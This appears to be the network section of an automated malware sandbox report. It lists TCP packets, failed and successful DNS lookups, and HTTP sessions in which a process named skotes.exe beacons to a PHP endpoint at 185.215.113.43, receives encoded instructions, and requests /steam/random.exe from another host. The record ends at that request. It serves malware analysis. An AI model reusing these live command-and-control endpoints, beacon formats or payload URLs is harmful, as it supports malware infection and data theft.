                                                      Sep 24, 2024 15:36:43.079724073 CEST4986680192.168.2.7185.215.113.16
                                                      Sep 24, 2024 15:36:43.085074902 CEST8049866185.215.113.16192.168.2.7
                                                      Sep 24, 2024 15:36:43.085160017 CEST4986680192.168.2.7185.215.113.16
                                                      Sep 24, 2024 15:36:43.087723017 CEST4986680192.168.2.7185.215.113.16
                                                      Sep 24, 2024 15:36:43.110244036 CEST8049866185.215.113.16192.168.2.7
                                                      Sep 24, 2024 15:36:43.503204107 CEST8049865185.215.113.43192.168.2.7
                                                      Sep 24, 2024 15:36:43.503276110 CEST4986580192.168.2.7185.215.113.43
                                                      Sep 24, 2024 15:36:43.818926096 CEST8049866185.215.113.16192.168.2.7
                                                      Sep 24, 2024 15:36:43.819129944 CEST4986680192.168.2.7185.215.113.16
                                                      Sep 24, 2024 15:36:43.825248003 CEST4986680192.168.2.7185.215.113.16
                                                      Sep 24, 2024 15:36:43.825604916 CEST4986780192.168.2.7185.215.113.16
                                                      Sep 24, 2024 15:36:43.830462933 CEST8049866185.215.113.16192.168.2.7
                                                      Sep 24, 2024 15:36:43.830701113 CEST4986680192.168.2.7185.215.113.16
                                                      Sep 24, 2024 15:36:43.830796003 CEST8049867185.215.113.16192.168.2.7
                                                      Sep 24, 2024 15:36:43.831091881 CEST4986780192.168.2.7185.215.113.16
                                                      Sep 24, 2024 15:36:43.831479073 CEST4986780192.168.2.7185.215.113.16
                                                      Sep 24, 2024 15:36:43.836100101 CEST8049867185.215.113.16192.168.2.7
                                                      Sep 24, 2024 15:36:43.836162090 CEST4986780192.168.2.7185.215.113.16
                                                      Sep 24, 2024 15:36:43.836263895 CEST4986780192.168.2.7185.215.113.16
                                                      Sep 24, 2024 15:36:43.836272955 CEST8049867185.215.113.16192.168.2.7
                                                      Sep 24, 2024 15:36:43.841072083 CEST8049867185.215.113.16192.168.2.7
                                                      Sep 24, 2024 15:36:43.841201067 CEST8049867185.215.113.16192.168.2.7
                                                      Sep 24, 2024 15:36:45.027721882 CEST4986580192.168.2.7185.215.113.43
                                                      Sep 24, 2024 15:36:45.028170109 CEST4986880192.168.2.7185.215.113.43
                                                      Sep 24, 2024 15:36:45.032895088 CEST8049865185.215.113.43192.168.2.7
                                                      Sep 24, 2024 15:36:45.032968044 CEST8049868185.215.113.43192.168.2.7
                                                      Sep 24, 2024 15:36:45.033023119 CEST4986580192.168.2.7185.215.113.43
                                                      Sep 24, 2024 15:36:45.033057928 CEST4986880192.168.2.7185.215.113.43
                                                      Sep 24, 2024 15:36:45.033761024 CEST4986880192.168.2.7185.215.113.43
                                                      Sep 24, 2024 15:36:45.038249969 CEST8049868185.215.113.43192.168.2.7
                                                      Sep 24, 2024 15:36:45.038320065 CEST4986880192.168.2.7185.215.113.43
                                                      Sep 24, 2024 15:36:45.038598061 CEST8049868185.215.113.43192.168.2.7
                                                      Sep 24, 2024 15:36:45.039516926 CEST4986880192.168.2.7185.215.113.43
                                                      Sep 24, 2024 15:36:45.044307947 CEST8049868185.215.113.43192.168.2.7
                                                      Sep 24, 2024 15:36:45.044389963 CEST8049868185.215.113.43192.168.2.7
                                                      Sep 24, 2024 15:36:46.976917982 CEST4987080192.168.2.7185.215.113.43
                                                      Sep 24, 2024 15:36:46.981817961 CEST8049870185.215.113.43192.168.2.7
                                                      Sep 24, 2024 15:36:46.981884003 CEST4987080192.168.2.7185.215.113.43
                                                      Sep 24, 2024 15:36:46.986943960 CEST8049870185.215.113.43192.168.2.7
                                                      Sep 24, 2024 15:36:46.986994982 CEST4987080192.168.2.7185.215.113.43
                                                      Sep 24, 2024 15:36:46.995872021 CEST4987080192.168.2.7185.215.113.43
                                                      Sep 24, 2024 15:36:46.996380091 CEST4987080192.168.2.7185.215.113.43
                                                      Sep 24, 2024 15:36:47.000977993 CEST8049870185.215.113.43192.168.2.7
                                                      Sep 24, 2024 15:36:47.001919985 CEST8049870185.215.113.43192.168.2.7
                                                      Sep 24, 2024 15:36:48.514946938 CEST4987180192.168.2.7185.215.113.43
                                                      Sep 24, 2024 15:36:48.520157099 CEST8049871185.215.113.43192.168.2.7
                                                      Sep 24, 2024 15:36:48.521931887 CEST4987180192.168.2.7185.215.113.43
                                                      Sep 24, 2024 15:36:48.522119999 CEST4987180192.168.2.7185.215.113.43
                                                      Sep 24, 2024 15:36:48.529233932 CEST8049871185.215.113.43192.168.2.7
                                                      Sep 24, 2024 15:36:48.529385090 CEST8049871185.215.113.43192.168.2.7
                                                      Sep 24, 2024 15:36:48.841681004 CEST4987280192.168.2.7185.215.113.16
                                                      Sep 24, 2024 15:36:49.046437979 CEST8049872185.215.113.16192.168.2.7
                                                      Sep 24, 2024 15:36:49.046530008 CEST4987280192.168.2.7185.215.113.16
                                                      Sep 24, 2024 15:36:49.053601027 CEST8049872185.215.113.16192.168.2.7
                                                      Sep 24, 2024 15:36:49.053680897 CEST4987280192.168.2.7185.215.113.16
                                                      Sep 24, 2024 15:36:49.075258970 CEST4987280192.168.2.7185.215.113.16
                                                      Sep 24, 2024 15:36:49.075536966 CEST4987280192.168.2.7185.215.113.16
                                                      Sep 24, 2024 15:36:49.080235004 CEST8049872185.215.113.16192.168.2.7
                                                      Sep 24, 2024 15:36:49.080471039 CEST8049872185.215.113.16192.168.2.7
                                                      Sep 24, 2024 15:36:50.240067005 CEST4987380192.168.2.7185.215.113.43
                                                      Sep 24, 2024 15:36:50.249062061 CEST8049873185.215.113.43192.168.2.7
                                                      Sep 24, 2024 15:36:50.252191067 CEST4987380192.168.2.7185.215.113.43
                                                      Sep 24, 2024 15:36:50.255012035 CEST4987380192.168.2.7185.215.113.43
                                                      Sep 24, 2024 15:36:50.260082960 CEST8049873185.215.113.43192.168.2.7
                                                      Sep 24, 2024 15:36:50.966732025 CEST8049873185.215.113.43192.168.2.7
                                                      Sep 24, 2024 15:36:50.966825008 CEST4987380192.168.2.7185.215.113.43
                                                      Sep 24, 2024 15:36:52.495071888 CEST4987380192.168.2.7185.215.113.43
                                                      Sep 24, 2024 15:36:52.495436907 CEST4987480192.168.2.7185.215.113.43
                                                      Sep 24, 2024 15:36:52.501796007 CEST8049874185.215.113.43192.168.2.7
                                                      Sep 24, 2024 15:36:52.501909018 CEST4987480192.168.2.7185.215.113.43
                                                      Sep 24, 2024 15:36:52.502881050 CEST4987480192.168.2.7185.215.113.43
                                                      Sep 24, 2024 15:36:52.503966093 CEST8049873185.215.113.43192.168.2.7
                                                      Sep 24, 2024 15:36:52.504026890 CEST4987380192.168.2.7185.215.113.43
                                                      Sep 24, 2024 15:36:52.507761002 CEST8049874185.215.113.43192.168.2.7
                                                      Sep 24, 2024 15:36:53.207607031 CEST8049874185.215.113.43192.168.2.7
                                                      Sep 24, 2024 15:36:53.207928896 CEST4987480192.168.2.7185.215.113.43
                                                      Sep 24, 2024 15:36:54.093080044 CEST4987580192.168.2.7185.215.113.16
                                                      Sep 24, 2024 15:36:54.098088026 CEST8049875185.215.113.16192.168.2.7
                                                      Sep 24, 2024 15:36:54.098176956 CEST4987580192.168.2.7185.215.113.16
                                                      Sep 24, 2024 15:36:54.098577976 CEST4987580192.168.2.7185.215.113.16
                                                      Sep 24, 2024 15:36:54.103442907 CEST8049875185.215.113.16192.168.2.7
                                                      Sep 24, 2024 15:36:54.842186928 CEST4987480192.168.2.7185.215.113.43
                                                      Sep 24, 2024 15:36:54.842523098 CEST4987680192.168.2.7185.215.113.43
                                                      Sep 24, 2024 15:36:55.213202000 CEST4987480192.168.2.7185.215.113.43
                                                      Sep 24, 2024 15:36:55.507200956 CEST8049875185.215.113.16192.168.2.7
                                                      Sep 24, 2024 15:36:55.507210970 CEST8049875185.215.113.16192.168.2.7
                                                      Sep 24, 2024 15:36:55.507221937 CEST8049875185.215.113.16192.168.2.7
                                                      Sep 24, 2024 15:36:55.507226944 CEST8049875185.215.113.16192.168.2.7
                                                      Sep 24, 2024 15:36:55.507237911 CEST8049875185.215.113.16192.168.2.7
                                                      Sep 24, 2024 15:36:55.507242918 CEST8049875185.215.113.16192.168.2.7
                                                      Sep 24, 2024 15:36:55.507253885 CEST8049875185.215.113.16192.168.2.7
                                                      Sep 24, 2024 15:36:55.507260084 CEST8049875185.215.113.16192.168.2.7
                                                      Sep 24, 2024 15:36:55.507266045 CEST8049875185.215.113.16192.168.2.7
                                                      Sep 24, 2024 15:36:55.507285118 CEST4987580192.168.2.7185.215.113.16
                                                      Sep 24, 2024 15:36:55.507298946 CEST8049875185.215.113.16192.168.2.7
                                                      Sep 24, 2024 15:36:55.507322073 CEST8049875185.215.113.16192.168.2.7
                                                      Sep 24, 2024 15:36:55.507333994 CEST4987580192.168.2.7185.215.113.16
                                                      Sep 24, 2024 15:36:55.507354975 CEST4987580192.168.2.7185.215.113.16
                                                      Sep 24, 2024 15:36:55.507549047 CEST8049875185.215.113.16192.168.2.7
                                                      Sep 24, 2024 15:36:55.507636070 CEST4987580192.168.2.7185.215.113.16
                                                      Sep 24, 2024 15:36:55.507834911 CEST8049875185.215.113.16192.168.2.7
                                                      Sep 24, 2024 15:36:55.507877111 CEST4987580192.168.2.7185.215.113.16
                                                      Sep 24, 2024 15:36:55.509119034 CEST8049876185.215.113.43192.168.2.7
                                                      Sep 24, 2024 15:36:55.509124994 CEST8049874185.215.113.43192.168.2.7
                                                      Sep 24, 2024 15:36:55.509242058 CEST4987680192.168.2.7185.215.113.43
                                                      Sep 24, 2024 15:36:55.509788990 CEST4987680192.168.2.7185.215.113.43
                                                      Sep 24, 2024 15:36:55.511281967 CEST8049874185.215.113.43192.168.2.7
                                                      Sep 24, 2024 15:36:55.511368036 CEST4987480192.168.2.7185.215.113.43
                                                      Sep 24, 2024 15:36:55.523196936 CEST8049875185.215.113.16192.168.2.7
                                                      Sep 24, 2024 15:36:55.523202896 CEST8049875185.215.113.16192.168.2.7
                                                      Sep 24, 2024 15:36:55.523214102 CEST8049875185.215.113.16192.168.2.7
                                                      Sep 24, 2024 15:36:55.523219109 CEST8049875185.215.113.16192.168.2.7
                                                      Sep 24, 2024 15:36:55.523225069 CEST8049875185.215.113.16192.168.2.7
                                                      Sep 24, 2024 15:36:55.523231030 CEST8049875185.215.113.16192.168.2.7
                                                      Sep 24, 2024 15:36:55.523236036 CEST8049875185.215.113.16192.168.2.7
                                                      Sep 24, 2024 15:36:55.523247957 CEST8049875185.215.113.16192.168.2.7
                                                      Sep 24, 2024 15:36:55.523252964 CEST8049875185.215.113.16192.168.2.7
                                                      Sep 24, 2024 15:36:55.523262024 CEST4987580192.168.2.7185.215.113.16
                                                      Sep 24, 2024 15:36:55.523273945 CEST8049875185.215.113.16192.168.2.7
                                                      Sep 24, 2024 15:36:55.523278952 CEST8049875185.215.113.16192.168.2.7
                                                      Sep 24, 2024 15:36:55.523284912 CEST8049875185.215.113.16192.168.2.7
                                                      Sep 24, 2024 15:36:55.523291111 CEST8049875185.215.113.16192.168.2.7
                                                      Sep 24, 2024 15:36:55.523297071 CEST8049875185.215.113.16192.168.2.7
                                                      Sep 24, 2024 15:36:55.523304939 CEST4987580192.168.2.7185.215.113.16
                                                      Sep 24, 2024 15:36:55.523314953 CEST8049875185.215.113.16192.168.2.7
                                                      Sep 24, 2024 15:36:55.523319960 CEST8049876185.215.113.43192.168.2.7
                                                      Sep 24, 2024 15:36:55.523329973 CEST4987580192.168.2.7185.215.113.16
                                                      Sep 24, 2024 15:36:55.523344040 CEST8049875185.215.113.16192.168.2.7
                                                      Sep 24, 2024 15:36:55.523349047 CEST8049875185.215.113.16192.168.2.7
                                                      Sep 24, 2024 15:36:55.523355961 CEST4987580192.168.2.7185.215.113.16
                                                      Sep 24, 2024 15:36:55.523365021 CEST8049875185.215.113.16192.168.2.7
                                                      Sep 24, 2024 15:36:55.523370981 CEST8049875185.215.113.16192.168.2.7
                                                      Sep 24, 2024 15:36:55.523390055 CEST4987580192.168.2.7185.215.113.16
                                                      Sep 24, 2024 15:36:55.523423910 CEST4987580192.168.2.7185.215.113.16
                                                      Sep 24, 2024 15:36:55.528266907 CEST8049875185.215.113.16192.168.2.7
                                                      Sep 24, 2024 15:36:55.528328896 CEST8049875185.215.113.16192.168.2.7
                                                      Sep 24, 2024 15:36:55.528382063 CEST4987580192.168.2.7185.215.113.16
                                                      Sep 24, 2024 15:36:55.528449059 CEST8049875185.215.113.16192.168.2.7
                                                      Sep 24, 2024 15:36:55.528491020 CEST8049875185.215.113.16192.168.2.7
                                                      Sep 24, 2024 15:36:55.528502941 CEST8049875185.215.113.16192.168.2.7
                                                      Sep 24, 2024 15:36:55.528532028 CEST4987580192.168.2.7185.215.113.16
                                                      Sep 24, 2024 15:36:55.528542995 CEST4987580192.168.2.7185.215.113.16
                                                      Sep 24, 2024 15:36:55.528562069 CEST8049875185.215.113.16192.168.2.7
                                                      Sep 24, 2024 15:36:55.528568029 CEST8049875185.215.113.16192.168.2.7
                                                      Sep 24, 2024 15:36:55.528606892 CEST4987580192.168.2.7185.215.113.16
                                                      Sep 24, 2024 15:36:55.529285908 CEST8049875185.215.113.16192.168.2.7
                                                      Sep 24, 2024 15:36:55.529355049 CEST8049875185.215.113.16192.168.2.7
                                                      Sep 24, 2024 15:36:55.529489040 CEST4987580192.168.2.7185.215.113.16
                                                      Sep 24, 2024 15:36:55.529649019 CEST8049875185.215.113.16192.168.2.7
                                                      Sep 24, 2024 15:36:55.529654026 CEST8049875185.215.113.16192.168.2.7
                                                      Sep 24, 2024 15:36:55.529666901 CEST8049875185.215.113.16192.168.2.7
                                                      Sep 24, 2024 15:36:55.529705048 CEST4987580192.168.2.7185.215.113.16
                                                      Sep 24, 2024 15:36:55.529720068 CEST4987580192.168.2.7185.215.113.16
                                                      Sep 24, 2024 15:36:55.529726028 CEST8049875185.215.113.16192.168.2.7
                                                      Sep 24, 2024 15:36:55.529732943 CEST8049875185.215.113.16192.168.2.7
                                                      Sep 24, 2024 15:36:55.529772997 CEST4987580192.168.2.7185.215.113.16
                                                      Sep 24, 2024 15:36:55.530466080 CEST8049875185.215.113.16192.168.2.7
                                                      Sep 24, 2024 15:36:55.530548096 CEST4987580192.168.2.7185.215.113.16
                                                      Sep 24, 2024 15:36:55.530602932 CEST8049875185.215.113.16192.168.2.7
                                                      Sep 24, 2024 15:36:55.530651093 CEST4987580192.168.2.7185.215.113.16
                                                      Sep 24, 2024 15:36:55.530678988 CEST8049875185.215.113.16192.168.2.7
                                                      Sep 24, 2024 15:36:55.530684948 CEST8049875185.215.113.16192.168.2.7
                                                      Sep 24, 2024 15:36:55.530692101 CEST8049875185.215.113.16192.168.2.7
                                                      Sep 24, 2024 15:36:55.530724049 CEST4987580192.168.2.7185.215.113.16
                                                      Sep 24, 2024 15:36:55.533210993 CEST8049875185.215.113.16192.168.2.7
                                                      Sep 24, 2024 15:36:55.533216000 CEST8049875185.215.113.16192.168.2.7
                                                      Sep 24, 2024 15:36:55.533227921 CEST8049875185.215.113.16192.168.2.7
                                                      Sep 24, 2024 15:36:55.533266068 CEST4987580192.168.2.7185.215.113.16
                                                      Sep 24, 2024 15:36:55.533351898 CEST8049875185.215.113.16192.168.2.7
                                                      Sep 24, 2024 15:36:55.533426046 CEST4987580192.168.2.7185.215.113.16
                                                      Sep 24, 2024 15:36:55.533610106 CEST8049875185.215.113.16192.168.2.7
                                                      Sep 24, 2024 15:36:55.533616066 CEST8049875185.215.113.16192.168.2.7
                                                      Sep 24, 2024 15:36:55.533626080 CEST8049875185.215.113.16192.168.2.7
                                                      Sep 24, 2024 15:36:55.533632040 CEST8049875185.215.113.16192.168.2.7
                                                      Sep 24, 2024 15:36:55.533664942 CEST4987580192.168.2.7185.215.113.16
                                                      Sep 24, 2024 15:36:55.533693075 CEST4987580192.168.2.7185.215.113.16
                                                      Sep 24, 2024 15:36:55.534214020 CEST8049875185.215.113.16192.168.2.7
                                                      Sep 24, 2024 15:36:55.534256935 CEST8049875185.215.113.16192.168.2.7
                                                      Sep 24, 2024 15:36:55.534262896 CEST4987580192.168.2.7185.215.113.16
                                                      Sep 24, 2024 15:36:55.534323931 CEST4987580192.168.2.7185.215.113.16
                                                      Sep 24, 2024 15:36:55.534533978 CEST8049875185.215.113.16192.168.2.7
                                                      Sep 24, 2024 15:36:55.534588099 CEST8049875185.215.113.16192.168.2.7
                                                      Sep 24, 2024 15:36:55.534604073 CEST8049875185.215.113.16192.168.2.7
                                                      Sep 24, 2024 15:36:55.534627914 CEST4987580192.168.2.7185.215.113.16
                                                      Sep 24, 2024 15:36:55.534641027 CEST8049875185.215.113.16192.168.2.7
                                                      Sep 24, 2024 15:36:55.534647942 CEST4987580192.168.2.7185.215.113.16
                                                      Sep 24, 2024 15:36:55.534677029 CEST4987580192.168.2.7185.215.113.16
                                                      Sep 24, 2024 15:36:55.535235882 CEST8049875185.215.113.16192.168.2.7
                                                      Sep 24, 2024 15:36:55.535279989 CEST8049875185.215.113.16192.168.2.7
                                                      Sep 24, 2024 15:36:55.535284996 CEST8049875185.215.113.16192.168.2.7
                                                      Sep 24, 2024 15:36:55.535290003 CEST4987580192.168.2.7185.215.113.16
                                                      Sep 24, 2024 15:36:55.535307884 CEST8049875185.215.113.16192.168.2.7
                                                      Sep 24, 2024 15:36:55.535327911 CEST4987580192.168.2.7185.215.113.16
                                                      Sep 24, 2024 15:36:55.535356998 CEST4987580192.168.2.7185.215.113.16
                                                      Sep 24, 2024 15:36:55.535948038 CEST8049875185.215.113.16192.168.2.7
                                                      Sep 24, 2024 15:36:55.535953999 CEST8049875185.215.113.16192.168.2.7
                                                      Sep 24, 2024 15:36:55.535964966 CEST8049875185.215.113.16192.168.2.7
                                                      Sep 24, 2024 15:36:55.535970926 CEST8049875185.215.113.16192.168.2.7
                                                      Sep 24, 2024 15:36:55.536000013 CEST4987580192.168.2.7185.215.113.16
                                                      Sep 24, 2024 15:36:55.536020041 CEST4987580192.168.2.7185.215.113.16
                                                      Sep 24, 2024 15:36:55.536909103 CEST8049875185.215.113.16192.168.2.7
                                                      Sep 24, 2024 15:36:55.537058115 CEST4987580192.168.2.7185.215.113.16
                                                      Sep 24, 2024 15:36:55.537241936 CEST8049875185.215.113.16192.168.2.7
                                                      Sep 24, 2024 15:36:55.537344933 CEST4987580192.168.2.7185.215.113.16
                                                      Sep 24, 2024 15:36:55.537765026 CEST8049875185.215.113.16192.168.2.7
                                                      Sep 24, 2024 15:36:55.537770987 CEST8049875185.215.113.16192.168.2.7
                                                      Sep 24, 2024 15:36:55.537782907 CEST8049875185.215.113.16192.168.2.7
                                                      Sep 24, 2024 15:36:55.537792921 CEST8049875185.215.113.16192.168.2.7
                                                      Sep 24, 2024 15:36:55.537800074 CEST8049875185.215.113.16192.168.2.7
                                                      Sep 24, 2024 15:36:55.537805080 CEST8049875185.215.113.16192.168.2.7
                                                      Sep 24, 2024 15:36:55.537811995 CEST4987580192.168.2.7185.215.113.16
                                                      Sep 24, 2024 15:36:55.537854910 CEST4987580192.168.2.7185.215.113.16
                                                      Sep 24, 2024 15:36:55.537987947 CEST8049875185.215.113.16192.168.2.7
                                                      Sep 24, 2024 15:36:55.537992954 CEST8049875185.215.113.16192.168.2.7
                                                      Sep 24, 2024 15:36:55.537998915 CEST8049875185.215.113.16192.168.2.7
                                                      Sep 24, 2024 15:36:55.538037062 CEST4987580192.168.2.7185.215.113.16
                                                      Sep 24, 2024 15:36:55.538048983 CEST4987580192.168.2.7185.215.113.16
                                                      Sep 24, 2024 15:36:55.538465023 CEST8049875185.215.113.16192.168.2.7
                                                      Sep 24, 2024 15:36:55.538470984 CEST8049875185.215.113.16192.168.2.7
                                                      Sep 24, 2024 15:36:55.538481951 CEST8049875185.215.113.16192.168.2.7
                                                      Sep 24, 2024 15:36:55.538526058 CEST4987580192.168.2.7185.215.113.16
                                                      Sep 24, 2024 15:36:55.538552999 CEST8049875185.215.113.16192.168.2.7
                                                      Sep 24, 2024 15:36:55.538558960 CEST8049875185.215.113.16192.168.2.7
                                                      Sep 24, 2024 15:36:55.538603067 CEST4987580192.168.2.7185.215.113.16
                                                      Sep 24, 2024 15:36:55.539344072 CEST8049875185.215.113.16192.168.2.7
                                                      Sep 24, 2024 15:36:55.539366961 CEST8049875185.215.113.16192.168.2.7
                                                      Sep 24, 2024 15:36:55.539372921 CEST8049875185.215.113.16192.168.2.7
                                                      Sep 24, 2024 15:36:55.539397955 CEST4987580192.168.2.7185.215.113.16
                                                      Sep 24, 2024 15:36:55.539411068 CEST4987580192.168.2.7185.215.113.16
                                                      Sep 24, 2024 15:36:55.539427042 CEST8049875185.215.113.16192.168.2.7
                                                      Sep 24, 2024 15:36:55.539432049 CEST8049875185.215.113.16192.168.2.7
                                                      Sep 24, 2024 15:36:55.539442062 CEST8049875185.215.113.16192.168.2.7

                                                      DNS Queries

                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                      Sep 24, 2024 15:37:45.865375042 CEST192.168.2.71.1.1.10xe58Standard query (0)www.leopardi.nlA (IP address)IN (0x0001)false

                                                      DNS Answers

                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                      Sep 24, 2024 15:37:07.711416960 CEST1.1.1.1192.168.2.70x1045Name error (3)garageserviceoperation.comnonenoneA (IP address)IN (0x0001)false
                                                      Sep 24, 2024 15:37:07.758358955 CEST1.1.1.1192.168.2.70x3a46Name error (3)solutionhub.ccnonenoneA (IP address)IN (0x0001)false
                                                      Sep 24, 2024 15:37:13.024389982 CEST1.1.1.1192.168.2.70xd115Name error (3)solutionhub.ccnonenoneA (IP address)IN (0x0001)false
                                                      Sep 24, 2024 15:37:18.736332893 CEST1.1.1.1192.168.2.70x4abeName error (3)garageserviceoperation.comnonenoneA (IP address)IN (0x0001)false
                                                      Sep 24, 2024 15:37:23.878858089 CEST1.1.1.1192.168.2.70xaf53Name error (3)solutionhub.ccnonenoneA (IP address)IN (0x0001)false
                                                      Sep 24, 2024 15:37:26.018843889 CEST1.1.1.1192.168.2.70x4dafName error (3)HAYtAoQHDCIZfrnmkrkib.HAYtAoQHDCIZfrnmkrkibnonenoneA (IP address)IN (0x0001)false
                                                      Sep 24, 2024 15:37:29.581089020 CEST1.1.1.1192.168.2.70xb0eeName error (3)garageserviceoperation.comnonenoneA (IP address)IN (0x0001)false
                                                      Sep 24, 2024 15:37:34.608715057 CEST1.1.1.1192.168.2.70x90a3Name error (3)solutionhub.ccnonenoneA (IP address)IN (0x0001)false
                                                      Sep 24, 2024 15:37:40.434743881 CEST1.1.1.1192.168.2.70xa520Name error (3)garageserviceoperation.comnonenoneA (IP address)IN (0x0001)false
                                                      Sep 24, 2024 15:37:45.479552984 CEST1.1.1.1192.168.2.70x3b54Name error (3)solutionhub.ccnonenoneA (IP address)IN (0x0001)false
                                                      Sep 24, 2024 15:37:45.888246059 CEST1.1.1.1192.168.2.70xe58No error (0)www.leopardi.nl46.19.218.204A (IP address)IN (0x0001)false
                                                      Sep 24, 2024 15:37:51.157525063 CEST1.1.1.1192.168.2.70xf764Name error (3)garageserviceoperation.comnonenoneA (IP address)IN (0x0001)false
                                                      Sep 24, 2024 15:37:56.746638060 CEST1.1.1.1192.168.2.70xb4bcName error (3)solutionhub.ccnonenoneA (IP address)IN (0x0001)false

                                                      HTTP Packets

                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      0192.168.2.749706185.215.113.43807392C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                      TimestampBytes transferredDirectionData
                                                      Sep 24, 2024 15:34:04.878874063 CEST156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Host: 185.215.113.43
                                                      Content-Length: 4
                                                      Cache-Control: no-cache
                                                      Data Raw: 73 74 3d 73
                                                      Data Ascii: st=s


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      1192.168.2.749707185.215.113.43807392C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                      TimestampBytes transferredDirectionData
                                                      Sep 24, 2024 15:34:06.397870064 CEST316OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Host: 185.215.113.43
                                                      Content-Length: 162
                                                      Cache-Control: no-cache
                                                      Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35
                                                      Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      2192.168.2.749708185.215.113.43807392C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                      TimestampBytes transferredDirectionData
                                                      Sep 24, 2024 15:34:08.079046011 CEST156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Host: 185.215.113.43
                                                      Content-Length: 4
                                                      Cache-Control: no-cache
                                                      Data Raw: 73 74 3d 73
                                                      Data Ascii: st=s


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      3192.168.2.749709185.215.113.43807392C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                      TimestampBytes transferredDirectionData
                                                      Sep 24, 2024 15:34:09.596081018 CEST316OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Host: 185.215.113.43
                                                      Content-Length: 162
                                                      Cache-Control: no-cache
                                                      Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35
                                                      Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
                                                      Sep 24, 2024 15:34:10.358345032 CEST650INHTTP/1.1 200 OK
                                                      Server: nginx/1.18.0 (Ubuntu)
                                                      Date: Tue, 24 Sep 2024 13:34:10 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: keep-alive
                                                      Data Raw: 31 63 62 0d 0a 20 3c 63 3e 31 30 30 30 30 30 32 30 30 31 2b 2b 2b 66 63 38 66 37 63 31 65 64 33 63 30 66 39 63 33 30 62 34 62 61 65 64 37 34 63 36 31 33 39 35 64 37 66 61 63 30 30 62 35 38 39 38 31 66 34 61 34 65 31 61 30 63 65 37 65 39 66 30 65 35 65 62 66 35 64 65 30 34 33 34 39 30 32 35 30 38 30 64 39 61 34 23 31 30 30 30 30 31 35 30 30 32 2b 2b 2b 66 63 38 66 37 63 31 65 64 33 63 30 66 39 63 33 30 62 34 62 61 65 64 37 34 63 36 31 33 39 35 64 37 66 61 63 30 30 62 35 38 39 38 31 66 34 61 34 65 31 61 30 63 65 37 65 39 66 30 65 35 65 62 66 35 64 65 30 34 33 34 39 30 32 35 30 38 30 64 39 23 31 30 30 30 30 31 38 30 34 32 2b 2b 2b 62 35 39 33 37 63 31 61 39 39 64 35 66 39 64 64 30 32 34 36 62 35 63 62 34 66 36 35 32 32 34 32 37 66 61 65 31 64 61 61 38 38 38 32 65 38 66 66 66 37 61 37 64 66 33 30 39 30 34 64 34 33 66 30 34 33 66 37 31 64 23 31 30 30 30 30 31 39 31 30 31 2b 2b 2b 62 35 39 33 37 63 31 61 39 39 64 35 66 39 64 64 30 32 34 36 62 35 63 62 34 66 36 35 32 32 34 32 37 66 61 65 31 64 61 61 38 38 [TRUNCATED]
                                                      Data Ascii: 1cb <c>1000002001+++fc8f7c1ed3c0f9c30b4baed74c61395d7fac00b58981f4a4e1a0ce7e9f0e5ebf5de04349025080d9a4#1000015002+++fc8f7c1ed3c0f9c30b4baed74c61395d7fac00b58981f4a4e1a0ce7e9f0e5ebf5de04349025080d9#1000018042+++b5937c1a99d5f9dd0246b5cb4f6522427fae1daa8882e8fff7a7df30904d43f043f71d#1000019101+++b5937c1a99d5f9dd0246b5cb4f6522427fae1daa8882e8fcf7b8c730804042ba5ce902415450#1000020001+++b5937c1a99d5f9dd0246b5cb4f6522427fae1daa8e9eb4e4f9b5846d934f48b15eaa495c49#<d>0


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      4192.168.2.749710185.215.113.103807392C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                      TimestampBytes transferredDirectionData
                                                      Sep 24, 2024 15:34:10.369381905 CEST57OUTGET /steam/random.exe HTTP/1.1
